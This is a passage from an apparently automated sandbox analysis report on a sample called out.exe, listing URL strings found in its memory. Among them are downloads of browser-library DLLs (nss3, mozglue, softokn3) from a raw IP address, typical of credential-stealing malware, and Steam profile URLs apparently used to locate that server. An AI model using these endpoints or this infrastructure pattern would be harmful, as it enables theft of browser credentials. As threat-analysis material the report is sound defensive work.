                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/4
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/7
                              Source: out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/=
                              Source: out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/G
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/I
                              Source: out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/V
                              Source: out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/_
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/e
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/freebl3.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dllNTEG
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dll_
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dll#
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dll.4.349.12.106.214DEX
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dllGE
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dlls
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dlly
                              Source: out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/n
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/nss3.dll
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/o
                              Source: out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/s
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dll5
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dllE
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dllg
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dllm
                              Source: out.exe, 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/sqlp.dll
                              Source: out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/vcruntime140.dll
                              Source: out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/vcruntime140.dll4/msvcp140.dllGE
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://49.12.106.214GDAK
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                              Source: out.exeString found in binary or memory: https://community.akamai.steams
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.akamai.steamstatic.
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2297618303.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
